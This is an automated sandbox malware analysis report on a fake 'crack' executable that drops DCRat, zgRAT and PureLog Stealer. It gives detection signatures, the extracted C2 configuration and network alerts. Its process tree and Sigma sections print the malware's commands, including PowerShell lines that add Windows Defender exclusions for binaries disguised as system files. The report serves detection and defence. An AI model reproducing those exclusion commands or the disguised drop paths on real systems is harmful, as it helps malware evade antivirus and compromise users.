Edit tour

Windows Analysis Report
NursultanAlphaCrack.bat.exe

Overview

General Information

Sample name:	NursultanAlphaCrack.bat.exe
Analysis ID:	1590001
MD5:	df15d1f8f7cc71bb1889895b367c7d2c
SHA1:	4a9d087d105976a1f7a1c7444a25b5e0a8ac0622
SHA256:	09bdb3282e1927dcb848126823280b066827c5dadd17ee6d445922440889d8f2
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates processes via WMI

Drops PE files with benign system names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Sigma detected: Windows Binaries Write Suspicious Extensions

Suspicious execution chain found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NursultanAlphaCrack.bat.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe" MD5: DF15D1F8F7CC71BB1889895B367C7D2C)

wscript.exe (PID: 7792 cmdline: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BlockcontainerWin.exe (PID: 7932 cmdline: "C:\portsurrogateFontCrt/BlockcontainerWin.exe" MD5: B3F6318C958712D0C78B5A969EE2EFD1)

powershell.exe (PID: 2492 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1516 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2156 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8052 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 1668 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7536 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7704 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2476 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7852 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4600 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

smss.exe (PID: 7508 cmdline: "C:\Program Files\Windows NT\smss.exe" MD5: B3F6318C958712D0C78B5A969EE2EFD1)

cmd.exe (PID: 848 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4848 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6292 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

smss.exe (PID: 5888 cmdline: "C:\Program Files\Windows NT\smss.exe" MD5: B3F6318C958712D0C78B5A969EE2EFD1)

BlockcontainerWin.exe (PID: 5652 cmdline: C:\portsurrogateFontCrt\BlockcontainerWin.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)

BlockcontainerWin.exe (PID: 3376 cmdline: C:\portsurrogateFontCrt\BlockcontainerWin.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)

GKcQVcpwHdHgqKNzncXgLOYQsT.exe (PID: 2192 cmdline: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)

cmd.exe (PID: 2552 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 8024 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

GKcQVcpwHdHgqKNzncXgLOYQsT.exe (PID: 2284 cmdline: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://237025cm.n9shteam.in/UpdatesqlCdn", "MUTEX": "DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
NursultanAlphaCrack.bat.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
NursultanAlphaCrack.bat.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Windows NT\smss.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows NT\smss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\portsurrogateFontCrt\BlockcontainerWin.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\portsurrogateFontCrt\BlockcontainerWin.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: BlockcontainerWin.exe PID: 7932	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: smss.exe PID: 7508	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: smss.exe PID: 5888	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.BlockcontainerWin.exe.fd0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.BlockcontainerWin.exe.fd0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.BlockcontainerWin.exe.13585ce8.8.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ProcessId: 7932, TargetFilename: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portsurrogateFontCrt/BlockcontainerWin.exe", ParentImage: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ParentProcessId: 7932, ParentProcessName: BlockcontainerWin.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', ProcessId: 2492, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows NT\smss.exe" , CommandLine: "C:\Program Files\Windows NT\smss.exe" , CommandLine|base64offset|contains: , Image: C:\Program Files\Windows NT\smss.exe, NewProcessName: C:\Program Files\Windows NT\smss.exe, OriginalFileName: C:\Program Files\Windows NT\smss.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2476, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Windows NT\smss.exe" , ProcessId: 7508, ProcessName: smss.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Windows NT\smss.exe, ProcessId: 7508, TargetFilename: C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe", ParentImage: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe, ParentProcessId: 7712, ParentProcessName: NursultanAlphaCrack.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" , ProcessId: 7792, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portsurrogateFontCrt/BlockcontainerWin.exe", ParentImage: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ParentProcessId: 7932, ParentProcessName: BlockcontainerWin.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', ProcessId: 2492, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:17:13.575913+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49882	104.21.80.1	80	TCP
2025-01-13T13:17:21.857172+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52220	104.21.80.1	80	TCP
2025-01-13T13:17:36.857189+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52270	104.21.48.1	80	TCP
2025-01-13T13:17:44.589748+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52271	104.21.48.1	80	TCP
2025-01-13T13:17:56.779104+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52272	104.21.48.1	80	TCP
2025-01-13T13:18:10.076013+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52273	104.21.48.1	80	TCP
2025-01-13T13:18:25.076021+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52274	104.21.48.1	80	TCP
2025-01-13T13:18:37.122916+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52275	104.21.48.1	80	TCP
2025-01-13T13:18:45.076063+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52276	104.21.48.1	80	TCP
2025-01-13T13:18:53.576114+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52277	104.21.48.1	80	TCP
2025-01-13T13:19:05.388613+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52278	104.21.48.1	80	TCP
2025-01-13T13:19:13.076114+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52279	104.21.48.1	80	TCP
2025-01-13T13:19:20.732460+0100	2048095	1	A Network Trojan was detected	192.168.2.9	52280	104.21.48.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NursultanAlphaCrack.bat.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://237025cm.n9shteam.in	Avira URL Cloud: Label: malware
Source: http://237025cm.n9shteam.in/UpdatesqlCdn.php	Avira URL Cloud: Label: malware
Source: http://237025cm.n9shteam.in/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\EErUokRe.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows NT\smss.exe	Avira: detection malicious, Label: TR/Spy.Agent.dbxid
Source: C:\Users\user\Desktop\BAOTDPUV.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Avira: detection malicious, Label: TR/Spy.Agent.dbxid
Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Avira: detection malicious, Label: TR/Spy.Agent.dbxid
Source: C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	Avira: detection malicious, Label: TR/Spy.Agent.dbxid
Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Avira: detection malicious, Label: TR/Spy.Agent.dbxid
Source: C:\Users\user\Desktop\BOAdhoQl.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb

Found malware configuration

Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://237025cm.n9shteam.in/UpdatesqlCdn", "MUTEX": "DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	ReversingLabs: Detection: 79%
Source: C:\Program Files\Windows NT\smss.exe	ReversingLabs: Detection: 79%
Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	ReversingLabs: Detection: 79%
Source: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	ReversingLabs: Detection: 79%
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\BAOTDPUV.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BOAdhoQl.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BwtLSSWj.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\DYilKdVO.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\EErUokRe.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\JDNtgNEK.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\OfbStevG.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\Rfxshdov.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ZFTyARuY.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\ZTFIdpqp.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\kHvGrYKy.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\lhCxVqkE.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\medFrqzz.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\oCwXyDAs.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ssnNFABl.log	ReversingLabs: Detection: 70%
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: NursultanAlphaCrack.bat.exe	Virustotal: Detection: 72%			Perma Link
Source: NursultanAlphaCrack.bat.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\EErUokRe.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JRLLnIaC.log	Joe Sandbox ML: detected
Source: C:\Program Files\Windows NT\smss.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: NursultanAlphaCrack.bat.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"}}
Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]
Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://237025cm.n9shteam.in/","UpdatesqlCdn"]]

Source: NursultanAlphaCrack.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows Sidebar\Gadgets\9e8d7a4ca61bd9	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\WindowsPowerShell\0a62118e203df5	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Directory created: C:\Program Files\Windows NT\smss.exe	Jump to behavior
